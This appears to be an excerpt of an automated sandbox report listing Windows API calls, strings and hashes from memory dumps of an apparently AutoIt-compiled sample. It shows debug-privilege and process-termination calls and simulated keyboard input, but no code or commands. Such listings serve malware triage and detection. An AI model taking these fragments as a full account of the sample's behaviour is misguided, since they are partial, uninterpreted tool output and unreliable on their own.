                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                    • Opcode ID: ab5f0e089d9a0f769d89017f000ca65da32330c99ce9d97edba634c8b8e23077
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5d52af1cde4a13b9a4fcc55677d968799d9a24fcbb36412d874ed5dde548fb3c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab5f0e089d9a0f769d89017f000ca65da32330c99ce9d97edba634c8b8e23077
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8618D742083429FD310DF15C494F26BBE1AF49318F1894ACE4966F7A2D771EC49CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EB43C1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EB43D6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EB43F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB4435
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EB4462
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EB4490
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                    • Opcode ID: efa9a87164273845b4f0d982d10aa5397db9f7fffbb3b87aba3bea4ae4f0c1c4
                                                                                                                                                                                                                                                                                                    • Instruction ID: d0e3d66170057d89237f97737b306a516558d3be89b5abd69a45028e4faaf031
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efa9a87164273845b4f0d982d10aa5397db9f7fffbb3b87aba3bea4ae4f0c1c4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6341CDB1A00318ABDF219F64CC49BEB7BE9EB48354F14112AF958F72D2D7709990CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E8C6C4
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00E8C6E4
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00E8C71A
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(011962C0), ref: 00E8C76B
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(011962C0,?,00000001,00000030), ref: 00E8C793
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                    • Opcode ID: b98eb7a1ba117665cc14e9a0ed3e6c60c1a1bca07303d69cbc74f4b8e6edf2f1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6fc25fa62fded6f3323c5c7ef19bad1dad7fc1ad475c3c22d0801aea08a3bdad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98eb7a1ba117665cc14e9a0ed3e6c60c1a1bca07303d69cbc74f4b8e6edf2f1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD519F706002059BDF10EF78D884AAEBBF4AF46318F34525AE91DB7291E3729945CF71
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB8740
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EB8765
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EB877D
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EB87A6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E9C1F2,00000000), ref: 00EB87C6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EB87B1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 77d7f8dd70b30bace2a3691564e640714469bacb6f8b82a52f044df7876b9078
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ab36257cfc532438f6518585546575973f6187a0a2930918c20004bf5c8aaca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77d7f8dd70b30bace2a3691564e640714469bacb6f8b82a52f044df7876b9078
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21A3716142619FCB145F39CD08AAB37A9EB84328F24572AF922F32F0EF308844CB10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                    • Opcode ID: fbd39a0e8ba6503b11977e3993f6a4e3071903d443c907b2ed1a6b32ce6acbc7
                                                                                                                                                                                                                                                                                                    • Instruction ID: e8e15cbf56879f6881aa78c5024ea434fb99b986e365cdeb83c6c15378aed410
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbd39a0e8ba6503b11977e3993f6a4e3071903d443c907b2ed1a6b32ce6acbc7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 991124729041147FDB28BB20EC4AFEE77ACDF00314F0011B6F549B2191FE758A818B50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 263f0672bdc2175aca1c15ba842b55f06b773a6d20f78e4b4e5781361dc58e08
                                                                                                                                                                                                                                                                                                    • Instruction ID: d081ce7ff3ca0fe92fa6b9d1bbb5763be376d1a5cb8e56ea6c1c7a5babc5f820
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 263f0672bdc2175aca1c15ba842b55f06b773a6d20f78e4b4e5781361dc58e08
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 194190A5D10214B5EB11FBB89C8AACFB7ACAF05310F51A462E50CF3161FA34E255C7E6
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EB37B7
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00EB37BF
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB37CA
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00EB37D6
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EB3812
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EB3823
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EB6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00EB385E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EB387D
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f9783338ebd6ba8ef41e4eecd98f342735dae263c55f2a7c97a5f754fabf9058
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40948e0bdee20f8b38ab9d6c7098893ac6b632f94d4108c1c2b9c71cd21b95f9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9783338ebd6ba8ef41e4eecd98f342735dae263c55f2a7c97a5f754fabf9058
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C072205224BFEB154F55CC8AFEB3BADEF09715F040065FE08EA291D6B59C41CBA0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                    • Opcode ID: a931b1cdca6525b8fce7be9522595f93d2a9bf329e543c6aad7a02b2bf915449
                                                                                                                                                                                                                                                                                                    • Instruction ID: 331ccc5235727dbcb1754cf4dcd2c09ade3364441ac4d27874045c02d81018b0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a931b1cdca6525b8fce7be9522595f93d2a9bf329e543c6aad7a02b2bf915449
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0D1D172A0070A9FDF10CF68C885AAEB7B5FF49318F149169E915BB280E770ED45CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E6194E
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E619D1
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E61B7B,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61A64
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E61AF7
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E61B22
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E61B2E
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E91C1B
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91C43
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00E91C67
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91C97
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91D1E
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91D83
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00E91DEF
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA43C8
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EA44D7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA44E7
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA467C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantInit.OLEAUT32(00000000), ref: 00E916DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantCopy.OLEAUT32(?,?), ref: 00E916E7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E9169E: VariantClear.OLEAUT32(?), ref: 00E916F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?,?,00E80C4E), ref: 00E8091B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80936
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80944
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?), ref: 00E80954
                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EA56AE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EA57B6
                                                                                                                                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EA582C
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00EA5837
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00EB2C1F
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00EB2C51
                                                                                                                                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EB2C79
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB2CAF
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00EB2CE9
                                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00EB2CF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E843AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: GetCurrentThreadId.KERNEL32 ref: 00E843B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E82F00), ref: 00E843BB
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EB2D7F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E8B8C0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8B8D5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8B936
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E8B964
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E8B983
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E8B9C4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E8B9E7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00E8B6E0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8B6F5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00E8B756
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E8B782
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E8B79F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E8B7DE
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E8B7FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00E55F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00E557E3
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E5585E
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E55879
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00E5589F
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00E55F16,00000000,?,?,?,?,?,?,?,?,?,00E55F16,?), ref: 00E558BE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00E55F16,00000000,?,?,?,?,?,?,?,?,?,00E55F16,?), ref: 00E558F7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                    • String ID:
